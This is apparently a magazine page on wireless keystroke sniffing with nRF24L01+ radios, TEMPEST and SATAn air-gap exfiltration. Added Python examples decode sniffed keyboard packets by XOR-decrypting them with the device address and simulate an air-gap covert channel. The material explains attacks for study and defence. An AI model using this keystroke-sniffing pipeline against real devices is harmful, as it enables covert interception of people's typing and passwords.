Page 184 - Cyber Defense eMagazine January 2024
The Nordic Semiconductor nRF24L01+ can be used to promiscuously sniff the radio packets exchanged
between wireless peripherals such as keyboards and mice and the dongle connected to the computer. The
attack needs no specially crafted hardware: the nRF24L01+ is a commodity 2.4 GHz transceiver module. The
same technique can be used to reverse engineer proprietary manufacturer protocols such as Nike+ and to
study the lower layers of the ANT+ protocol.
In this exploit the sniffing is achieved by shrinking the address the radio matches on to 2 bytes (an
illegal value for the address-width register), disabling the hardware checksum, and setting that 2-byte
address to the preamble pattern, so that the sniffer's radio accepts background noise as the preamble and
the real preamble as a valid address (T. Goodspeed, 2011). The trick is therefore a few illegal register
settings plus a disabled CRC: the radio then starts receiving where a real packet's address begins, so the
first bytes of every "payload" it delivers are the target device's actual MAC address, followed by the
packet itself.
Once the target's MAC address has been recovered from the capture, the next step is to break the packet
encryption. Typically the packet header is cleartext and only the payload is encrypted, by XORing it with the
MAC address. Applying the same XOR to the right regions therefore decrypts the USB HID events and reveals
which keys were pressed, so this technique can be used to sniff keystrokes and mouse clicks promiscuously.
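The following is an added example, not code from the article or from Travis Goodspeed's work, showing the receiver-side processing the two paragraphs above describe: splitting a promiscuous-mode capture into the device's real address and its payload, re-checking the CRC in software (because the hardware checksum had to be disabled, the sniffer also hands back noise), XOR-decrypting the payload with the recovered MAC address, and reading the HID key codes. The frame layout, the 5-byte address length, the CRC placement and the sample keyboard address are assumptions constructed for this example; the real Enhanced ShockBurst frame also carries a 9-bit control field after the address, which is omitted here for clarity.

```python
"""Decode an nRF24L01+ promiscuous-mode capture (illustrative, added example).

Assumed, simplified frame layout (constructed for this example, not the real
Enhanced ShockBurst frame, which has a 9-bit control field after the address):
    [5-byte device address][n-byte XOR-encrypted payload][2-byte CRC-16/CCITT-FALSE]
The CRC covers address + encrypted payload. Because the sniffer has the hardware
CRC check disabled, it also delivers noise, so the CRC is re-checked in software.
"""
from typing import Optional, Tuple

ADDR_LEN = 5  # the nRF24L01+ supports 3- to 5-byte addresses; 5 is assumed here


def crc16_ccitt(data: bytes, init: int = 0xFFFF) -> int:
    """CRC-16/CCITT-FALSE: polynomial 0x1021, init 0xFFFF, no reflection."""
    crc = init
    for byte in data:
        crc ^= byte << 8
        for _ in range(8):
            if crc & 0x8000:
                crc = ((crc << 1) ^ 0x1021) & 0xFFFF
            else:
                crc = (crc << 1) & 0xFFFF
    return crc


def xor_with_address(payload: bytes, address: bytes) -> bytes:
    """The cipher the article describes: payload XORed with the device's MAC
    address, repeated to the payload length. XOR is its own inverse, so the
    same call encrypts and decrypts."""
    return bytes(p ^ address[i % len(address)] for i, p in enumerate(payload))


def parse_promiscuous_capture(raw: bytes) -> Optional[Tuple[bytes, bytes]]:
    """Split a raw capture into (device address, encrypted payload).

    The 2-byte fake address (preamble pattern) has already been consumed by the
    radio, so the bytes it hands us start with the device's real address.
    Returns None when the software CRC fails, i.e. the capture was noise."""
    if len(raw) < ADDR_LEN + 2:
        return None
    body, crc_rx = raw[:-2], int.from_bytes(raw[-2:], "big")
    if crc16_ccitt(body) != crc_rx:
        return None
    return body[:ADDR_LEN], body[ADDR_LEN:]


def hid_report_to_text(report: bytes) -> str:
    """Map a standard 8-byte USB HID boot keyboard report (modifiers, reserved,
    up to six usage IDs) to printable characters; unmodified keys only."""
    out = []
    for usage in report[2:8]:
        if 0x04 <= usage <= 0x1D:          # a-z
            out.append(chr(ord("a") + usage - 0x04))
        elif 0x1E <= usage <= 0x26:        # 1-9
            out.append(chr(ord("1") + usage - 0x1E))
        elif usage == 0x27:                # 0
            out.append("0")
        elif usage == 0x28:                # Enter
            out.append("\n")
        elif usage == 0x2C:                # space
            out.append(" ")
    return "".join(out)


def decode_capture(raw: bytes) -> Optional[str]:
    """Full pipeline: validate, recover the address, XOR-decrypt, read the keys."""
    parsed = parse_promiscuous_capture(raw)
    if parsed is None:
        return None
    address, encrypted = parsed
    return hid_report_to_text(xor_with_address(encrypted, address))


def build_capture(address: bytes, report: bytes) -> bytes:
    """Transmitter side, used only to construct sample input for this example."""
    body = address + xor_with_address(report, address)
    return body + crc16_ccitt(body).to_bytes(2, "big")


# Constructed sample: a keyboard with a made-up address A1:B2:C3:D4:E5 sending "hi".
SAMPLE_ADDRESS = bytes.fromhex("a1b2c3d4e5")
SAMPLE_REPORT = bytes([0x00, 0x00, 0x0B, 0x0C, 0x00, 0x00, 0x00, 0x00])
SAMPLE_CAPTURE = build_capture(SAMPLE_ADDRESS, SAMPLE_REPORT)

if __name__ == "__main__":
    print("decoded:", repr(decode_capture(SAMPLE_CAPTURE)))
    noise = bytearray(SAMPLE_CAPTURE)
    noise[3] ^= 0x01  # one flipped bit fails the CRC, as a noise burst would
    print("corrupted:", decode_capture(bytes(noise)))
```

The software CRC is the step a practitioner should not skip: with the radio's own check switched off, most of what the sniffer returns is noise, and only captures whose CRC validates are worth feeding to the XOR step.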
2.2 NATO Tempest
TEMPEST is a United States National Security Agency specification and a North Atlantic Treaty
Organization (NATO) certification. It concerns spying on information systems through their unintentional
emanations: electrical or radio signals, vibrations, sounds, and other leakage. TEMPEST covers methods
that can be used to spy on equipment, including wireless equipment, for example to recover user
keystrokes. It treats the emitted signals as sensitive because, if they are captured and analyzed, they may
disclose all the data transmitted and processed by the device. Besides describing how such spying is done,
it defines ways to protect devices against it. These protection efforts are known as emission security
(EMSEC), a subset of communications security (COMSEC). Protection is achieved by shielding, masking,
monitoring, filtering, and by defining how close an attacker can get to the equipment without being able to
receive the leaked signals. The standards define levels A to C, with level A the strictest, intended for
critical devices that operate in NATO Zone 0.
2.3 SATAn: Air-Gap Exfiltration Attack
Air-gapped systems usually have no connection to the public internet and are used in critical
environments such as industrial OT networks, government, military, nuclear plants, and other industrial
networks; they are isolated from less secure networks that do have internet access. It was discovered that
data can nevertheless be exfiltrated from air-gapped systems through Serial ATA (SATA) cables, which act as
wireless antennas inside the computer.
To perform this attack, the attacker must first gain physical access to the air-gapped system and install
the malware. The malware then prepares the sensitive data for exfiltration by encoding and modulating it.
During specific read and write operations the SATA cables emit electromagnetic signals in a radio band
between 5.9995 and 5.9996 GHz, and the malware times those operations so that the emissions correspond to
specific characters (Mordechai Guri, 2022). The malware can hijack legitimate processes on the air-gapped
system to generate this disk activity. In a real-world scenario, the receiver would be embedded in a piece of
hardware placed close to the air-gapped system or realized as a process in a computer
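To make the "modulation and encoding" step concrete, here is an added example that simulates an on-off-keying covert channel of the kind the SATAn description implies; it is not Mordechai Guri's code. Instead of driving real SATA reads and writes, the transmitter produces the emission timeline those I/O bursts would create (1 = burst of disk activity, 0 = idle), and the receiver demodulates a noisy power trace and recovers the frame. The frame format (preamble, length, payload), bit period, noise level and threshold are assumptions of this example.

```python
"""Simulated on-off-keying (OOK) covert channel for air-gap exfiltration.

Added example, not Mordechai Guri's code. The real SATAn transmitter creates
radio emissions by timing SATA read/write bursts; here the 'transmitter' only
produces the emission timeline those bursts would cause (1 = burst, 0 = idle),
and the 'receiver' demodulates a noisy power trace. Frame format, bit period,
noise level and threshold are assumptions of this example.
"""
import random
from typing import List, Optional

PREAMBLE = [1, 0, 1, 0, 1, 0, 1, 1]  # sync word 0xAB (assumed)
SAMPLES_PER_BIT = 20                 # receiver samples per bit window (assumed)


def int_to_bits(value: int, width: int) -> List[int]:
    return [(value >> i) & 1 for i in range(width - 1, -1, -1)]


def bits_to_int(bits: List[int]) -> int:
    value = 0
    for bit in bits:
        value = (value << 1) | bit
    return value


def frame_bits(payload: bytes) -> List[int]:
    """Encoding step: preamble, 8-bit length, then payload bytes MSB-first."""
    bits = list(PREAMBLE) + int_to_bits(len(payload), 8)
    for byte in payload:
        bits += int_to_bits(byte, 8)
    return bits


def emit(bits: List[int], rng: random.Random, noise_sigma: float = 0.15) -> List[float]:
    """Modulation step: each 1-bit is a window of I/O activity (high emitted
    power), each 0-bit is idle (low power); Gaussian noise stands in for the
    real radio channel."""
    trace = []
    for bit in bits:
        level = 1.0 if bit else 0.0
        trace += [level + rng.gauss(0.0, noise_sigma) for _ in range(SAMPLES_PER_BIT)]
    return trace


def demodulate(trace: List[float], threshold: float = 0.5) -> List[int]:
    """Average the power in each bit window and slice it against a threshold."""
    windows = len(trace) // SAMPLES_PER_BIT
    bits = []
    for i in range(windows):
        window = trace[i * SAMPLES_PER_BIT:(i + 1) * SAMPLES_PER_BIT]
        bits.append(1 if sum(window) / len(window) > threshold else 0)
    return bits


def decode_frame(bits: List[int]) -> Optional[bytes]:
    """Find the first preamble, read the length, return the payload; None if
    there is no sync word or the frame is truncated."""
    n = len(PREAMBLE)
    for start in range(len(bits) - n + 1):
        if bits[start:start + n] != PREAMBLE:
            continue
        pos = start + n
        if pos + 8 > len(bits):
            return None
        length = bits_to_int(bits[pos:pos + 8])
        pos += 8
        if pos + 8 * length > len(bits):
            return None
        return bytes(bits_to_int(bits[pos + 8 * i:pos + 8 * i + 8]) for i in range(length))
    return None


def roundtrip(payload: bytes, seed: int = 1, idle_lead: int = 13) -> Optional[bytes]:
    """Send payload over the simulated channel after an idle period and decode it."""
    rng = random.Random(seed)
    bits = [0] * idle_lead + frame_bits(payload)
    return decode_frame(demodulate(emit(bits, rng)))


if __name__ == "__main__":
    print(roundtrip(b"key=42"))
```

The simulation assumes the receiver samples aligned to the transmitter's bit windows; a real receiver also needs clock recovery, and the achievable bit rate over a genuine SATA emission is far lower than this toy channel suggests. The preamble is what lets the receiver distinguish the start of a transmission from ordinary disk activity of the target.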